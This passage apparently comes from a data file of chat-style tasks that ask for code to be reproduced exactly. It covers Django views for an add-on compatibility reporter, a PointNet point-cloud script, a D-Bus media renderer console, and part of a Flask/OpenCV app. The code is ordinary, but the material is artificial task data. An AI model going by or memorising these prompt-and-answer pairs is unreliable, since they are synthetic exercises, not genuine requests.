request.GET.get('previous'):\n qs = qs.filter(**{\n 'support.%s.max__gte' % app: vint(compat['previous'])})\n else:\n qs = qs.filter(**{'support.%s.max__gte' % app: 0})\n if binary is not None:\n qs = qs.filter(binary=binary)\n addons = amo.utils.paginate(request, qs)\n for obj in addons.object_list:\n obj['usage'] = obj['usage'][app]\n obj['max_version'] = obj['max_version'][app]\n return addons, CompatTotals.objects.get(app=app).total\n\n\n@csrf_exempt\n@post_required\ndef incoming(request):\n # Turn camelCase into snake_case.\n def snake_case(s):\n return re.sub('[A-Z]+', '_\\g<0>', s).lower()\n\n try:\n data = [(snake_case(k), v)\n for k, v in json.loads(request.body).items()]\n except Exception:\n return http.HttpResponseBadRequest()\n\n # Build up a new report.\n report = CompatReport(client_ip=request.META.get('REMOTE_ADDR', ''))\n fields = CompatReport._meta.get_all_field_names()\n for key, value in data:\n if key in fields:\n setattr(report, key, value)\n else:\n return http.HttpResponseBadRequest()\n\n report.save()\n return http.HttpResponse(status=204)\n\n\ndef reporter(request):\n query = request.GET.get('guid')\n if query:\n qs = None\n if query.isdigit():\n qs = Addon.with_unlisted.filter(id=query)\n if not qs:\n qs = Addon.with_unlisted.filter(slug=query)\n if not qs:\n qs = Addon.with_unlisted.filter(guid=query)\n if not qs and len(query) > 4:\n qs = CompatReport.objects.filter(guid__startswith=query)\n if qs:\n guid = qs[0].guid\n addon = Addon.with_unlisted.get(guid=guid)\n if addon.is_listed or owner_or_unlisted_reviewer(request, addon):\n return redirect('compat.reporter_detail', guid)\n addons = (Addon.with_unlisted.filter(authors=request.user)\n if request.user.is_authenticated() else [])\n return render(request, 'compat/reporter.html',\n dict(query=query, addons=addons))\n\n\ndef reporter_detail(request, guid):\n try:\n addon = Addon.with_unlisted.get(guid=guid)\n except Addon.DoesNotExist:\n addon = None\n name = addon.name if addon else guid\n qs = CompatReport.objects.filter(guid=guid)\n\n if (addon and not addon.is_listed and\n not owner_or_unlisted_reviewer(request, addon)):\n # Not authorized? Let's pretend this addon simply doesn't exist.\n name = guid\n qs = CompatReport.objects.none()\n\n form = AppVerForm(request.GET)\n if request.GET and form.is_valid() and form.cleaned_data['appver']:\n # Apply filters only if we have a good app/version combination.\n app, ver = form.cleaned_data['appver'].split('-')\n app = amo.APP_IDS[int(app)]\n ver = vdict(floor_version(ver))['major'] # 3.6 => 3\n\n # Ideally we'd have a `version_int` column to do strict version\n # comparing, but that's overkill for basic version filtering here.\n qs = qs.filter(app_guid=app.guid,\n app_version__startswith=str(ver) + '.')\n\n works_ = dict(qs.values_list('works_properly').annotate(Count('id')))\n works = {'success': works_.get(True, 0), 'failure': works_.get(False, 0)}\n\n works_properly = request.GET.get('works_properly')\n if works_properly:\n qs = qs.filter(works_properly=works_properly)\n reports = amo.utils.paginate(request, qs.order_by('-created'), 100)\n\n return render(request, 'compat/reporter_detail.html',\n dict(reports=reports, works=works,\n works_properly=works_properly,\n name=name, guid=guid, form=form))\n```<|memory_end|>\nReconstruct the code word-for-word and space-for-space.",
"role": "user"
}
] |
```python
import json
import re
from django import http
from django.db.models import Count
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from tower import ugettext as _
import amo
import amo.utils
from addons.decorators import owner_or_unlisted_reviewer
from amo.decorators import post_required
from amo.utils import urlparams
from amo.urlresolvers import reverse
from addons.models import Addon
from search.utils import floor_version
from versions.compare import version_dict as vdict, version_int as vint
from .models import CompatReport, AppCompat, CompatTotals
from .forms import AppVerForm, CompatForm
def index(request, version=None):
template = 'compat/index.html'
COMPAT = [v for v in amo.COMPAT if v['app'] == request.APP.id]
compat_dict = dict((v['main'], v) for v in COMPAT)
if not COMPAT:
return render(request, template, {'results': False})
if version not in compat_dict:
return http.HttpResponseRedirect(reverse('compat.index',
args=[COMPAT[0]['main']]))
qs = AppCompat.search()
binary = None
initial = {'appver': '%s-%s' % (request.APP.id, version), 'type': 'all'}
initial.update(request.GET.items())
form = CompatForm(initial)
if request.GET and form.is_valid():
if form.cleaned_data['appver']:
app, ver = form.cleaned_data['appver'].split('-')
if int(app) != request.APP.id or ver != version:
new = reverse('compat.index', args=[ver], add_prefix=False)
url = '/%s%s' % (amo.APP_IDS[int(app)].short, new)
type_ = form.cleaned_data['type'] or None
return http.HttpResponseRedirect(urlparams(url, type=type_))
if form.cleaned_data['type'] != 'all':
binary = form.cleaned_data['type'] == 'binary'
compat, app = compat_dict[version], str(request.APP.id)
compat_queries = (
('prev', qs.query(**{
'top_95.%s.%s' % (app, vint(compat['previous'])): True,
'support.%s.max__gte' % app: vint(compat['previous'])})),
('top_95', qs.query(**{'top_95_all.%s' % app: True})),
('all', qs),
)
compat_levels = [(key, version_compat(queryset, compat, app, binary))
for key, queryset in compat_queries]
usage_addons, usage_total = usage_stats(request, compat, app, binary)
return render(request, template,
{'version': version, 'usage_addons': usage_addons,
'usage_total': usage_total, 'compat_levels': compat_levels,
'form': form, 'results': True,
'show_previous': request.GET.get('previous')})
def version_compat(qs, compat, app, binary):
facets = []
for v, prev in zip(compat['versions'], (None,) + compat['versions']):
d = {'from': vint(v)}
if prev:
d['to'] = vint(prev)
facets.append(d)
# Pick up everything else for an Other count.
facets.append({'to': vint(compat['versions'][-1])})
facet = {'range': {'support.%s.max' % app: facets}}
if binary is not None:
qs = qs.query(binary=binary)
qs = qs.facet(by_status=facet)
result = qs[:0].raw()
total_addons = result['hits']['total']
ranges = result['facets']['by_status']['ranges']
titles = compat['versions'] + (_('Other'),)
faceted = [(v, r['count']) for v, r in zip(titles, ranges)]
return total_addons, faceted
def usage_stats(request, compat, app, binary=None):
# Get the list of add-ons for usage stats.
qs = AppCompat.search().order_by('-usage.%s' % app).values_dict()
if request.GET.get('previous'):
qs = qs.filter(**{
'support.%s.max__gte' % app: vint(compat['previous'])})
else:
qs = qs.filter(**{'support.%s.max__gte' % app: 0})
if binary is not None:
qs = qs.filter(binary=binary)
addons = amo.utils.paginate(request, qs)
for obj in addons.object_list:
obj['usage'] = obj['usage'][app]
obj['max_version'] = obj['max_version'][app]
return addons, CompatTotals.objects.get(app=app).total
@csrf_exempt
@post_required
def incoming(request):
# Turn camelCase into snake_case.
def snake_case(s):
return re.sub('[A-Z]+', '_\g<0>', s).lower()
try:
data = [(snake_case(k), v)
for k, v in json.loads(request.body).items()]
except Exception:
return http.HttpResponseBadRequest()
# Build up a new report.
report = CompatReport(client_ip=request.META.get('REMOTE_ADDR', ''))
fields = CompatReport._meta.get_all_field_names()
for key, value in data:
if key in fields:
setattr(report, key, value)
else:
return http.HttpResponseBadRequest()
report.save()
return http.HttpResponse(status=204)
def reporter(request):
query = request.GET.get('guid')
if query:
qs = None
if query.isdigit():
qs = Addon.with_unlisted.filter(id=query)
if not qs:
qs = Addon.with_unlisted.filter(slug=query)
if not qs:
qs = Addon.with_unlisted.filter(guid=query)
if not qs and len(query) > 4:
qs = CompatReport.objects.filter(guid__startswith=query)
if qs:
guid = qs[0].guid
addon = Addon.with_unlisted.get(guid=guid)
if addon.is_listed or owner_or_unlisted_reviewer(request, addon):
return redirect('compat.reporter_detail', guid)
addons = (Addon.with_unlisted.filter(authors=request.user)
if request.user.is_authenticated() else [])
return render(request, 'compat/reporter.html',
dict(query=query, addons=addons))
def reporter_detail(request, guid):
try:
addon = Addon.with_unlisted.get(guid=guid)
except Addon.DoesNotExist:
addon = None
name = addon.name if addon else guid
qs = CompatReport.objects.filter(guid=guid)
if (addon and not addon.is_listed and
not owner_or_unlisted_reviewer(request, addon)):
# Not authorized? Let's pretend this addon simply doesn't exist.
name = guid
qs = CompatReport.objects.none()
form = AppVerForm(request.GET)
if request.GET and form.is_valid() and form.cleaned_data['appver']:
# Apply filters only if we have a good app/version combination.
app, ver = form.cleaned_data['appver'].split('-')
app = amo.APP_IDS[int(app)]
ver = vdict(floor_version(ver))['major'] # 3.6 => 3
# Ideally we'd have a `version_int` column to do strict version
# comparing, but that's overkill for basic version filtering here.
qs = qs.filter(app_guid=app.guid,
app_version__startswith=str(ver) + '.')
works_ = dict(qs.values_list('works_properly').annotate(Count('id')))
works = {'success': works_.get(True, 0), 'failure': works_.get(False, 0)}
works_properly = request.GET.get('works_properly')
if works_properly:
qs = qs.filter(works_properly=works_properly)
reports = amo.utils.paginate(request, qs.order_by('-created'), 100)
return render(request, 'compat/reporter_detail.html',
dict(reports=reports, works=works,
works_properly=works_properly,
name=name, guid=guid, form=form))
```
|
[
{
"content": "Return the code exactly, with no changes:\n```python\nfrom __future__ import print_function\nfrom show3d_balls import *\nimport argparse\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom datasets import PartDataset\nfrom pointnet import PointGen, PointGenC, PointNetAE\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\n\n#showpoints(np.random.randn(2500,3), c1 = np.random.uniform(0,1,size = (2500)))\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--model', type=str, default = '', help='model path')\n\nopt = parser.parse_args()\nprint (opt)\n\nae = PointNetAE(num_points = 2048)\nae.load_state_dict(torch.load(opt.model))\n\ndataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', class_choice = ['Chair'], classification = True, npoints = 2048)\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=64,\n shuffle=True, num_workers=1)\n\n\nae.cuda()\n\ni,data = enumerate(dataloader, 0).next()\npoints, _ = data\npoints = Variable(points)\n\nbs = points.size()[0]\npoints = points.transpose(2,1)\npoints = points.cuda()\n \ngen = ae(points)\npoint_np = gen.transpose(2,1).cpu().data.numpy()\n\n \n#showpoints(points.transpose(2,1).cpu().data.numpy())\nshowpoints(point_np)\n\n#sim_noise = Variable(torch.randn(1000, 100))\n#points = gen(sim_noise)\n#point_np = points.transpose(2,1).data.numpy()\n#print(point_np.shape)\n\n#np.savez('gan.npz', points = point_np)\n```",
"role": "user"
}
] |
[
{
"content": "Return the code exactly, with no changes:\n<|memory_start|>```python\nfrom __future__ import print_function\nfrom show3d_balls import *\nimport argparse\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom datasets import PartDataset\nfrom pointnet import PointGen, PointGenC, PointNetAE\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\n\n#showpoints(np.random.randn(2500,3), c1 = np.random.uniform(0,1,size = (2500)))\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--model', type=str, default = '', help='model path')\n\nopt = parser.parse_args()\nprint (opt)\n\nae = PointNetAE(num_points = 2048)\nae.load_state_dict(torch.load(opt.model))\n\ndataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', class_choice = ['Chair'], classification = True, npoints = 2048)\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=64,\n shuffle=True, num_workers=1)\n\n\nae.cuda()\n\ni,data = enumerate(dataloader, 0).next()\npoints, _ = data\npoints = Variable(points)\n\nbs = points.size()[0]\npoints = points.transpose(2,1)\npoints = points.cuda()\n \ngen = ae(points)\npoint_np = gen.transpose(2,1).cpu().data.numpy()\n\n \n#showpoints(points.transpose(2,1).cpu().data.numpy())\nshowpoints(point_np)\n\n#sim_noise = Variable(torch.randn(1000, 100))\n#points = gen(sim_noise)\n#point_np = points.transpose(2,1).data.numpy()\n#print(point_np.shape)\n\n#np.savez('gan.npz', points = point_np)\n```<|memory_end|>",
"role": "user"
}
] |
```python
from __future__ import print_function
from show3d_balls import *
import argparse
import os
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from datasets import PartDataset
from pointnet import PointGen, PointGenC, PointNetAE
import torch.nn.functional as F
import matplotlib.pyplot as plt
#showpoints(np.random.randn(2500,3), c1 = np.random.uniform(0,1,size = (2500)))
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default = '', help='model path')
opt = parser.parse_args()
print (opt)
ae = PointNetAE(num_points = 2048)
ae.load_state_dict(torch.load(opt.model))
dataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', class_choice = ['Chair'], classification = True, npoints = 2048)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=64,
shuffle=True, num_workers=1)
ae.cuda()
i,data = enumerate(dataloader, 0).next()
points, _ = data
points = Variable(points)
bs = points.size()[0]
points = points.transpose(2,1)
points = points.cuda()
gen = ae(points)
point_np = gen.transpose(2,1).cpu().data.numpy()
#showpoints(points.transpose(2,1).cpu().data.numpy())
showpoints(point_np)
#sim_noise = Variable(torch.randn(1000, 100))
#points = gen(sim_noise)
#point_np = points.transpose(2,1).data.numpy()
#print(point_np.shape)
#np.savez('gan.npz', points = point_np)
```
|
[
{
"content": "Here is a code file:\n```python\n# -*- coding: utf-8 -*-\n\n# renderer-console\n#\n# Copyright (C) 2012 Intel Corporation. All rights reserved.\n#\n# This program is free software; you can redistribute it and/or modify it\n# under the terms and conditions of the GNU Lesser General Public License,\n# version 2.1, as published by the Free Software Foundation.\n#\n# This program is distributed in the hope it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License\n# for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# Sébastien Bianti <[email protected]>\n#\n\nimport dbus\nimport json\nimport xml.etree.ElementTree as ET\n\nROOT_OBJECT_PATH = '/com/intel/RendererServiceUPnP'\nRENDERER_BUS = 'com.intel.renderer-service-upnp'\n\nPROPS_IF_NAME = 'org.freedesktop.DBus.Properties'\nINTROSPECTABLE_IF_NAME = 'org.freedesktop.DBus.Introspectable'\n\nDEVICE_IF_NAME = 'com.intel.UPnP.RendererDevice'\nPUSH_HOST_IF_NAME = 'com.intel.RendererServiceUPnP.PushHost'\nMANAGER_INTERFACE = 'com.intel.RendererServiceUPnP.Manager'\n\nMEDIAPLAYER2_IF_NAME = 'org.mpris.MediaPlayer2'\nPLAYER_IF_NAME = 'org.mpris.MediaPlayer2.Player'\n\n\nglobal bus_type\nbus_type = dbus.SessionBus()\n\ndef print_json(props):\n print json.dumps(props, indent=4, sort_keys=True)\n\ndef get_interface(path, if_name):\n return dbus.Interface(bus_type.get_object(RENDERER_BUS, path), if_name)\n\nclass Renderer(object):\n \"Represent a renderer service\"\n\n def __init__(self, object_path):\n self.__path = object_path\n self.__propsIF = get_interface(object_path, PROPS_IF_NAME)\n self.__playerIF = get_interface(object_path, PLAYER_IF_NAME)\n self.__pushhostIF = get_interface(object_path, PUSH_HOST_IF_NAME)\n\n def get_interfaces(self):\n try:\n introspectable_IF = get_interface(self.__path,\n INTROSPECTABLE_IF_NAME)\n except:\n print(u\"Failed to retrieve introspectable interface\")\n\n introspection = introspectable_IF.Introspect()\n tree = ET.fromstring(introspection)\n\n return [i.attrib['name'] for i in tree if i.tag == \"interface\"]\n\n def interfaces(self):\n for i in self.get_interfaces():\n print i\n\n def get_prop(self, prop_name, inner_if_name = \"\"):\n return self.__propsIF.Get(inner_if_name, prop_name)\n\n def get_props(self, inner_if_name = \"\"):\n return self.__propsIF.GetAll(inner_if_name)\n\n def print_props(self, inner_if_name = \"\"):\n print_json(self.get_props(inner_if_name))\n\n def set_prop(self, prop_name, if_name, val):\n \"\"\"\n Sets only the following properties :\n \tRate and Volume\n \"\"\"\n return self.__propsIF.Set(if_name, prop_name, val)\n\n# Control methods\n def play(self):\n self.__playerIF.Play()\n\n def pause(self):\n self.__playerIF.Pause()\n\n def play_pause(self):\n self.__playerIF.PlayPause()\n\n def next(self):\n self.__playerIF.Next()\n\n def open_uri(self, uri):\n self.__playerIF.OpenUri(uri)\n\n def previous(self):\n self.__playerIF.Previous()\n\n def seek(self, offset):\n self.__playerIF.Seek(offset)\n\n def goto_track(self, trackID):\n self.__playerIF.GotoTrack(trackID)\n\n def set_position(self, trackID, position):\n self.__playerIF.setPosition(trackID, position)\n\n def stop(self):\n self.__playerIF.Stop()\n\n# Push Host methods\n def host_file(self, path):\n return self.__pushhostIF.HostFile(path)\n\n def remove_file(self, path):\n self.__pushhostIF.RemoveFile(path)\n\nclass Manager(object):\n \"\"\"\n High level class for detecting Renderers and doing common operations\n on RendererServiceUPnP\n \"\"\"\n\n def __init__(self):\n self.__manager = get_interface(ROOT_OBJECT_PATH, MANAGER_INTERFACE)\n self.__renderers = []\n\n def update_renderers(self):\n self.__renderers = self.__manager.GetServers()\n\n def get_renderers(self):\n self.update_renderers()\n return self.__renderers\n\n def renderers(self):\n self.update_renderers()\n\n for path in self.__renderers:\n try:\n renderer = Renderer(path)\n renderer_name = renderer.get_prop(\"Identity\")\n print(u\"%s : %s\" % (path, renderer_name))\n except:\n print(u\"Failed to retrieve Identity for interface %s\" % path)\n\n def get_version(self):\n return self.__manager.GetVersion()\n\n def version(self):\n print self.get_version()\n\n def release(self):\n self.__manager.Release()\n\n\nif __name__ == \"__main__\":\n\n print(\"\\n\\t\\t\\tExample for using rendererconsole:\")\n print(\"\\t\\t\\t¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\\n\")\n\n manager = Manager()\n print(\"Version = %s\" % manager.get_version())\n print(\"¯¯¯¯¯¯¯\")\n\n print \"\\nRenderer's list:\"\n print(\"¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\")\n manager.renderers()\n\n renderer_list = manager.get_renderers()\n\n for name in renderer_list:\n renderer = Renderer(name)\n interface_list = renderer.get_interfaces()\n\n print(\"\\nInterfaces of %s:\" % name)\n print(\"¯¯¯¯¯¯¯¯¯¯¯¯¯¯\" + \"¯\" * len(name))\n for i in interface_list:\n print i\n\n if_name = DEVICE_IF_NAME\n if (if_name in interface_list) :\n print(\"\\nProperties of %s on %s:\" % (if_name, name))\n print(\"¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\" + (len(name) + len(if_name)) * \"¯\")\n renderer.print_props(if_name)\n```\nReturn the same code.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n\n# renderer-console\n#\n# Copyright (C) 2012 Intel Corporation. All rights reserved.\n#\n# This program is free software; you can redistribute it and/or modify it\n# under the terms and conditions of the GNU Lesser General Public License,\n# version 2.1, as published by the Free Software Foundation.\n#\n# This program is distributed in the hope it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License\n# for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# Sébastien Bianti <[email protected]>\n#\n\nimport dbus\nimport json\nimport xml.etree.ElementTree as ET\n\nROOT_OBJECT_PATH = '/com/intel/RendererServiceUPnP'\nRENDERER_BUS = 'com.intel.renderer-service-upnp'\n\nPROPS_IF_NAME = 'org.freedesktop.DBus.Properties'\nINTROSPECTABLE_IF_NAME = 'org.freedesktop.DBus.Introspectable'\n\nDEVICE_IF_NAME = 'com.intel.UPnP.RendererDevice'\nPUSH_HOST_IF_NAME = 'com.intel.RendererServiceUPnP.PushHost'\nMANAGER_INTERFACE = 'com.intel.RendererServiceUPnP.Manager'\n\nMEDIAPLAYER2_IF_NAME = 'org.mpris.MediaPlayer2'\nPLAYER_IF_NAME = 'org.mpris.MediaPlayer2.Player'\n\n\nglobal bus_type\nbus_type = dbus.SessionBus()\n\ndef print_json(props):\n print json.dumps(props, indent=4, sort_keys=True)\n\ndef get_interface(path, if_name):\n return dbus.Interface(bus_type.get_object(RENDERER_BUS, path), if_name)\n\nclass Renderer(object):\n \"Represent a renderer service\"\n\n def __init__(self, object_path):\n self.__path = object_path\n self.__propsIF = get_interface(object_path, PROPS_IF_NAME)\n self.__playerIF = get_interface(object_path, PLAYER_IF_NAME)\n self.__pushhostIF = get_interface(object_path, PUSH_HOST_IF_NAME)\n\n def get_interfaces(self):\n try:\n introspectable_IF = get_interface(self.__path,\n INTROSPECTABLE_IF_NAME)\n except:\n print(u\"Failed to retrieve introspectable interface\")\n\n introspection = introspectable_IF.Introspect()\n tree = ET.fromstring(introspection)\n\n return [i.attrib['name'] for i in tree if i.tag == \"interface\"]\n\n def interfaces(self):\n for i in self.get_interfaces():\n print i\n\n def get_prop(self, prop_name, inner_if_name = \"\"):\n return self.__propsIF.Get(inner_if_name, prop_name)\n\n def get_props(self, inner_if_name = \"\"):\n return self.__propsIF.GetAll(inner_if_name)\n\n def print_props(self, inner_if_name = \"\"):\n print_json(self.get_props(inner_if_name))\n\n def set_prop(self, prop_name, if_name, val):\n \"\"\"\n Sets only the following properties :\n \tRate and Volume\n \"\"\"\n return self.__propsIF.Set(if_name, prop_name, val)\n\n# Control methods\n def play(self):\n self.__playerIF.Play()\n\n def pause(self):\n self.__playerIF.Pause()\n\n def play_pause(self):\n self.__playerIF.PlayPause()\n\n def next(self):\n self.__playerIF.Next()\n\n def open_uri(self, uri):\n self.__playerIF.OpenUri(uri)\n\n def previous(self):\n self.__playerIF.Previous()\n\n def seek(self, offset):\n self.__playerIF.Seek(offset)\n\n def goto_track(self, trackID):\n self.__playerIF.GotoTrack(trackID)\n\n def set_position(self, trackID, position):\n self.__playerIF.setPosition(trackID, position)\n\n def stop(self):\n self.__playerIF.Stop()\n\n# Push Host methods\n def host_file(self, path):\n return self.__pushhostIF.HostFile(path)\n\n def remove_file(self, path):\n self.__pushhostIF.RemoveFile(path)\n\nclass Manager(object):\n \"\"\"\n High level class for detecting Renderers and doing common operations\n on RendererServiceUPnP\n \"\"\"\n\n def __init__(self):\n self.__manager = get_interface(ROOT_OBJECT_PATH, MANAGER_INTERFACE)\n self.__renderers = []\n\n def update_renderers(self):\n self.__renderers = self.__manager.GetServers()\n\n def get_renderers(self):\n self.update_renderers()\n return self.__renderers\n\n def renderers(self):\n self.update_renderers()\n\n for path in self.__renderers:\n try:\n renderer = Renderer(path)\n renderer_name = renderer.get_prop(\"Identity\")\n print(u\"%s : %s\" % (path, renderer_name))\n except:\n print(u\"Failed to retrieve Identity for interface %s\" % path)\n\n def get_version(self):\n return self.__manager.GetVersion()\n\n def version(self):\n print self.get_version()\n\n def release(self):\n self.__manager.Release()\n\n\nif __name__ == \"__main__\":\n\n print(\"\\n\\t\\t\\tExample for using rendererconsole:\")\n print(\"\\t\\t\\t¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\\n\")\n\n manager = Manager()\n print(\"Version = %s\" % manager.get_version())\n print(\"¯¯¯¯¯¯¯\")\n\n print \"\\nRenderer's list:\"\n print(\"¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\")\n manager.renderers()\n\n renderer_list = manager.get_renderers()\n\n for name in renderer_list:\n renderer = Renderer(name)\n interface_list = renderer.get_interfaces()\n\n print(\"\\nInterfaces of %s:\" % name)\n print(\"¯¯¯¯¯¯¯¯¯¯¯¯¯¯\" + \"¯\" * len(name))\n for i in interface_list:\n print i\n\n if_name = DEVICE_IF_NAME\n if (if_name in interface_list) :\n print(\"\\nProperties of %s on %s:\" % (if_name, name))\n print(\"¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\" + (len(name) + len(if_name)) * \"¯\")\n renderer.print_props(if_name)\n```<|memory_end|>\nReturn the same code.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
# renderer-console
#
# Copyright (C) 2012 Intel Corporation. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
# Sébastien Bianti <[email protected]>
#
import dbus
import json
import xml.etree.ElementTree as ET
ROOT_OBJECT_PATH = '/com/intel/RendererServiceUPnP'
RENDERER_BUS = 'com.intel.renderer-service-upnp'
PROPS_IF_NAME = 'org.freedesktop.DBus.Properties'
INTROSPECTABLE_IF_NAME = 'org.freedesktop.DBus.Introspectable'
DEVICE_IF_NAME = 'com.intel.UPnP.RendererDevice'
PUSH_HOST_IF_NAME = 'com.intel.RendererServiceUPnP.PushHost'
MANAGER_INTERFACE = 'com.intel.RendererServiceUPnP.Manager'
MEDIAPLAYER2_IF_NAME = 'org.mpris.MediaPlayer2'
PLAYER_IF_NAME = 'org.mpris.MediaPlayer2.Player'
global bus_type
bus_type = dbus.SessionBus()
def print_json(props):
print json.dumps(props, indent=4, sort_keys=True)
def get_interface(path, if_name):
return dbus.Interface(bus_type.get_object(RENDERER_BUS, path), if_name)
class Renderer(object):
"Represent a renderer service"
def __init__(self, object_path):
self.__path = object_path
self.__propsIF = get_interface(object_path, PROPS_IF_NAME)
self.__playerIF = get_interface(object_path, PLAYER_IF_NAME)
self.__pushhostIF = get_interface(object_path, PUSH_HOST_IF_NAME)
def get_interfaces(self):
try:
introspectable_IF = get_interface(self.__path,
INTROSPECTABLE_IF_NAME)
except:
print(u"Failed to retrieve introspectable interface")
introspection = introspectable_IF.Introspect()
tree = ET.fromstring(introspection)
return [i.attrib['name'] for i in tree if i.tag == "interface"]
def interfaces(self):
for i in self.get_interfaces():
print i
def get_prop(self, prop_name, inner_if_name = ""):
return self.__propsIF.Get(inner_if_name, prop_name)
def get_props(self, inner_if_name = ""):
return self.__propsIF.GetAll(inner_if_name)
def print_props(self, inner_if_name = ""):
print_json(self.get_props(inner_if_name))
def set_prop(self, prop_name, if_name, val):
"""
Sets only the following properties :
Rate and Volume
"""
return self.__propsIF.Set(if_name, prop_name, val)
# Control methods
def play(self):
self.__playerIF.Play()
def pause(self):
self.__playerIF.Pause()
def play_pause(self):
self.__playerIF.PlayPause()
def next(self):
self.__playerIF.Next()
def open_uri(self, uri):
self.__playerIF.OpenUri(uri)
def previous(self):
self.__playerIF.Previous()
def seek(self, offset):
self.__playerIF.Seek(offset)
def goto_track(self, trackID):
self.__playerIF.GotoTrack(trackID)
def set_position(self, trackID, position):
self.__playerIF.setPosition(trackID, position)
def stop(self):
self.__playerIF.Stop()
# Push Host methods
def host_file(self, path):
return self.__pushhostIF.HostFile(path)
def remove_file(self, path):
self.__pushhostIF.RemoveFile(path)
class Manager(object):
"""
High level class for detecting Renderers and doing common operations
on RendererServiceUPnP
"""
def __init__(self):
self.__manager = get_interface(ROOT_OBJECT_PATH, MANAGER_INTERFACE)
self.__renderers = []
def update_renderers(self):
self.__renderers = self.__manager.GetServers()
def get_renderers(self):
self.update_renderers()
return self.__renderers
def renderers(self):
self.update_renderers()
for path in self.__renderers:
try:
renderer = Renderer(path)
renderer_name = renderer.get_prop("Identity")
print(u"%s : %s" % (path, renderer_name))
except:
print(u"Failed to retrieve Identity for interface %s" % path)
def get_version(self):
return self.__manager.GetVersion()
def version(self):
print self.get_version()
def release(self):
self.__manager.Release()
if __name__ == "__main__":
print("\n\t\t\tExample for using rendererconsole:")
print("\t\t\t¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\n")
manager = Manager()
print("Version = %s" % manager.get_version())
print("¯¯¯¯¯¯¯")
print "\nRenderer's list:"
print("¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯")
manager.renderers()
renderer_list = manager.get_renderers()
for name in renderer_list:
renderer = Renderer(name)
interface_list = renderer.get_interfaces()
print("\nInterfaces of %s:" % name)
print("¯¯¯¯¯¯¯¯¯¯¯¯¯¯" + "¯" * len(name))
for i in interface_list:
print i
if_name = DEVICE_IF_NAME
if (if_name in interface_list) :
print("\nProperties of %s on %s:" % (if_name, name))
print("¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯" + (len(name) + len(if_name)) * "¯")
renderer.print_props(if_name)
```
|
[
{
"content": "```python\n#!/usr/bin/env python\n\n\nfrom __future__ import unicode_literals, print_function\n\nimport logging\nimport os\nfrom StringIO import StringIO\nfrom logging.handlers import RotatingFileHandler\n\nimport cv2\nfrom PIL import Image\nfrom flask import Flask, make_response, request, send_from_directory, jsonify, render_template, send_file\n\napp = Flask(__name__, static_url_path='')\napp.config.update(\n DEBUG=True,\n)\n\n# Generate a secret random key for the session\napp.secret_key = os.urandom(24)\n\n\[email protected]('/')\ndef index(name=None):\n return render_template('index.html', name=name)\n\n\[email protected]('/canny')\ndef canny():\n # adapted from https://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_canny/py_canny.html#canny\n img = cv2.imread('static/img/ship.jpg', 0)\n edges = cv2.Canny(img, 100, 200)\n im = Image.fromarray(edges)\n img2 = StringIO()\n im.save(img2, format=\"png\")\n img2.seek(0)\n return send_file(img2, 